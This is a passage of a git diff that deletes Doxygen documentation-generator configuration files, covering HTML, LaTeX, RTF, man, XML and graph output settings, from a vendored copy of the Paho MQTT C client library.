-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = NO
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             =
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = YES
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = NO
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 1000
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = YES
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in
deleted file mode 100644
index 802651a..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal.in
+++ /dev/null
@@ -1,1852 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "MQTT C Client Libraries Internals"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
